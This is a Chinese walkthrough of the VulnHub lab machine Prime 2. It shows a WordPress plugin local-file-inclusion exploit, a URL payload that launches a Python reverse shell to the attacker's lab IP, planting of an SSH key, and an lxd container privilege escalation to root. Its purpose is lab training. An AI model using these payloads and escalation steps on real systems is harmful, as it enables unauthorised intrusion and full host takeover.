[渗透测试学习靶机07] vulnhub靶场 Prime 2

这篇具有很好参考价值的文章主要介绍了[渗透测试学习靶机07] vulnhub靶场 Prime 2。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Kali的IP地址:192.168.127.139

靶机的IP地址:192.168.127.145

目录

一、信息搜集

二、漏洞挖掘

三、漏洞利用

四、提权

总结:


Prime 2这个靶机我看网上很少有人通关打靶练习,自己尝试做了一下,感觉整体难度:比较难,大家可以参考一下。

一、信息搜集

1.1、扫描主机IP

[渗透测试学习靶机07] vulnhub靶场 Prime 2

1.2、扫描端口

[渗透测试学习靶机07] vulnhub靶场 Prime 2

[渗透测试学习靶机07] vulnhub靶场 Prime 2

发现开放了22(ssh)、80(http)、139、445、10123(使用python搭建的http)等端口

1.3、访问端口

先访问80端口,发现就是一个正常的页面

[渗透测试学习靶机07] vulnhub靶场 Prime 2

之后在访问10123端口,发现应该是某个用户的家目录

[渗透测试学习靶机07] vulnhub靶场 Prime 2

我们将所有文件下载下来进行查看

先创建一个文件夹,把所有下载的文件放在文件夹里

[渗透测试学习靶机07] vulnhub靶场 Prime 2

[渗透测试学习靶机07] vulnhub靶场 Prime 2

[渗透测试学习靶机07] vulnhub靶场 Prime 2

在这里我就下载了几个文件,因为其他文件名字有点怪,我something文件中发下一些提示,也没啥东西

[渗透测试学习靶机07] vulnhub靶场 Prime 2

1.4、扫描目录

通过目录扫描发现一个wordpress的站点和一个server目录

[渗透测试学习靶机07] vulnhub靶场 Prime 2

我们先查看server目录,下载server目录下的文件,解压后发现是一套网站的源码,没有什么作用

[渗透测试学习靶机07] vulnhub靶场 Prime 2

[渗透测试学习靶机07] vulnhub靶场 Prime 2

我们接着查看wp站点,就是一个普通的页面。

[渗透测试学习靶机07] vulnhub靶场 Prime 2

二、漏洞挖掘

猜想一下肯定其他地方有漏洞,我们使用wpscan进行扫描,试一下

第一次使用WPScan软件的时候需要更新,但是更新会报错,这个时候看我另外一篇文章,也是做这个靶机的时候整理的

链接:Wpscan更新报错的问题,以及使用

扫描命令:

wpscan --url http://192.168.127.145/wp/ --enumerate

[渗透测试学习靶机07] vulnhub靶场 Prime 2

[渗透测试学习靶机07] vulnhub靶场 Prime 2

我们得到一个用户名:admin

接着在使用wpscan api-token后再次进行扫描发现存在一个LFI漏洞(文件包含漏洞)

扫描命令:

wpscan --url http://192.168.127.145/wp/ -e --api-token CPW3*********************************ZkfaXk

[渗透测试学习靶机07] vulnhub靶场 Prime 2

三、漏洞利用

(利用以上的方式拿到 webshell,或者其他权限)

如上图所示,在画箭头的地方有一个网址:Full Disclosure: WordPress Plugin GraceMedia Media Player 1.0 - Local FileInclusion

在Full Disclosure: WordPress Plugin GraceMedia Media Player 1.0 - Local FileInclusion可以看到文件包含漏洞过程

[渗透测试学习靶机07] vulnhub靶场 Prime 2

接着我们查看一下passwd


view-source:http://192.168.127.145/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

[渗透测试学习靶机07] vulnhub靶场 Prime 2

接着进行Webshell 反弹

http://192.168.127.145/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.127.139",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

[渗透测试学习靶机07] vulnhub靶场 Prime 2

然后我们使用python获取一个交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

[渗透测试学习靶机07] vulnhub靶场 Prime 2

并在/var/www/html/wp的目录下发现数据库的密码:root

[渗透测试学习靶机07] vulnhub靶场 Prime 2

[渗透测试学习靶机07] vulnhub靶场 Prime 2

于是用 enum4linux进行扫描,获得一个shell

enum4linux -a 192.168.127.145

[渗透测试学习靶机07] vulnhub靶场 Prime 2

[渗透测试学习靶机07] vulnhub靶场 Prime 2

接着我们使用smbclient进行连接

smbclient  //192.168.127.145/welcome

密码为:root

[渗透测试学习靶机07] vulnhub靶场 Prime 2

紧接着我们创建ssh公钥,ssh-keygen

 ssh-keygen -b 2048

[渗透测试学习靶机07] vulnhub靶场 Prime 2

id_rsa.pub复制到tmp目录下命名位authorized_keys

[渗透测试学习靶机07] vulnhub靶场 Prime 2

authorized_keys上传到目标主机的.ssh目录下

[渗透测试学习靶机07] vulnhub靶场 Prime 2

然后使用ssh登录到目标主机

[渗透测试学习靶机07] vulnhub靶场 Prime 2

查看用户id发现jarves还属于lxd

[渗透测试学习靶机07] vulnhub靶场 Prime 2

首先我们从github下载构建好的Alpine,然后进行执行

git clone  https://github.com/saghul/lxd-alpine-builder.git

cd lxd-alpine-builder

./build-alpine

[渗透测试学习靶机07] vulnhub靶场 Prime 2

[渗透测试学习靶机07] vulnhub靶场 Prime 2

四、提权

接着我们将生成的文件上传至目标机器

​
wget http://192.168.127.139:8889/alpine-v3.16-x86_64-20221016_1724.tar.gz 

[渗透测试学习靶机07] vulnhub靶场 Prime 2

[渗透测试学习靶机07] vulnhub靶场 Prime 2

[渗透测试学习靶机07] vulnhub靶场 Prime 2

接着我们使用lxd进行初始化

​
lxd init

[渗透测试学习靶机07] vulnhub靶场 Prime 2

然后导入镜像

 lxc image import ./alpine-v3.16-x86_64-20221016_1724.tar.gz --alias myimage

[渗透测试学习靶机07] vulnhub靶场 Prime 2

查看镜像

lxc image list

[渗透测试学习靶机07] vulnhub靶场 Prime 2

进入到容器的命令行

lxc init myimage ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh

[渗透测试学习靶机07] vulnhub靶场 Prime 2

进入mnt/root目录,这个目录包含所有宿主机文件

[渗透测试学习靶机07] vulnhub靶场 Prime 2

替换root目录下的authorized_keys文件

[渗透测试学习靶机07] vulnhub靶场 Prime 2

最后使用ssh连接拿到root权限

[渗透测试学习靶机07] vulnhub靶场 Prime 2

总结:

本次靶机通关练习,难度比较难,整个过程中涉及到LFI漏洞(文件包含漏洞),有关Wpscan软件的使用,是一个有关文件上传漏洞的练习。文章来源地址https://www.toymoban.com/news/detail-449159.html

到了这里,关于[渗透测试学习靶机07] vulnhub靶场 Prime 2的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2

    vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 这是一个漏洞靶机,老样子需要找到flag即可。 官方下载:https://download.vulnhub.com/myfileserver/My_file_server_2.o

    2023年04月19日
    浏览(34)
  • VulnHub靶机渗透:SKYTOWER: 1

    https://www.vulnhub.com/entry/skytower-1,96/ 靶机IP:192.168.56.101 kali IP:192.168.56.102 发现22端口过滤,开放了80和3128端口,那就是优先级80,3128,22。 日常,先目录爆破 在目录爆破的过程中查看网页内容。 发现登录框,尝试万能密码。(这里用户和密码一样) 报错了,错误信息为 从这

    2024年02月10日
    浏览(74)
  • [VulnHub靶机渗透] pWnOS 2.0

    目录 一、前言 二、外围打点——信息收集 1、主机探测 2、端口扫描 3、漏洞扫描 三、信息收集+渗透测试 1、web渗透测试 2、利用sqlmap上传木马,拿www-data权限 3、Simple PHP 框架漏洞利用,拿www-data权限 四、提权 1、常规提权操作+信息收集 3、crackmapexec密码碰撞 4、root权限 靶机

    2024年04月10日
    浏览(27)
  • [VulnHub靶机渗透]:billu_b0x 快速通关

    目录 前言: 访问80端口的web页面 1.扫描目录

    2024年01月21日
    浏览(25)
  • VulnHub靶场渗透实战11-Billu_b0x

    kali:192.168.3.9 桥接模式。 靶机:192.168.3.12 桥接模式(nat模式也可以,我桥接是为了方便我物理机的浏览器访问) 1.arp扫描(也可用nmapC段发现),主机发现。 获取的靶机IP地址是:192.168.3.12。  2.扫描开启的端口和服务。  访问一下80端口开放的web页面。  2.看这页面可能存在

    2024年02月01日
    浏览(25)
  • vulnhub靶机AI-Web-1.0渗透笔记(文件上传,提权部分各种姿势)

    信息收集就略了,nmap就可以了,没有太多知识 你会收集到 1.网页绝对路径,这里通过sql注入上传文件或者通过sqlmap获取–os-shell会用到 2.http://靶场ip/se3reTdir777/index.php# 这是一个sql注入页面 先测试有无SQL注入漏洞,输入SQL注入测试神技  \\\' 进行测试 提示我们存在SQL语句错误,表

    2024年01月21日
    浏览(32)
  • 【甄选靶场】Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权)

    Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权) 靶场地址 提取码:rong 🔥系列专栏:Vulnhub百个项目渗透 🎉欢迎关注🔎点赞👍收藏⭐️留言📝 📆首发时间:🌴2022年8月30日🌴 🍭作者水平很有限,如果发现错误,还望告知,感谢! ` 本文章仅用作实验学习,

    2024年02月06日
    浏览(30)
  • Vulnhub之Gigroot靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.103 NMAP扫描结果表明目标主机有3个开放端口:22(ssh)、80(http)、11211(?) 将wp.gitroot.vuln加入/etc/hosts文件中: 此时访问url,从返回页面可知目标为Wordpress站点: 因为我们已知目标运行wordpress站点,因此从gobuster和nikto工具运

    2024年02月01日
    浏览(24)
  • Vulnhub之Inclusiveness靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.111 NMAP扫描结果表明目标主机有3个开放端口:21(ftp)、22(ssh)、80(http) 对FTP服务的信息收集结果如下: 目标主机允许匿名访问 匿名用户允许上传文件 匿名用户无法变换目录 FTP服务版本没有漏洞可利用 接下来做一下目

    2023年04月19日
    浏览(29)
  • Vulnhub之GreenOptics靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 NMAP扫描结果表明目标主机有5个开放端口:21(ftp)、22(ssh)、53(dns)、80(http)、10000(http) 说明需要添加主机记录到/etc/hosts文件: 再次访问: 返回页面为用户登录界面,10000端口的信息收集暂时告一段落。 nikto没有得到

    2024年02月01日
    浏览(30)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包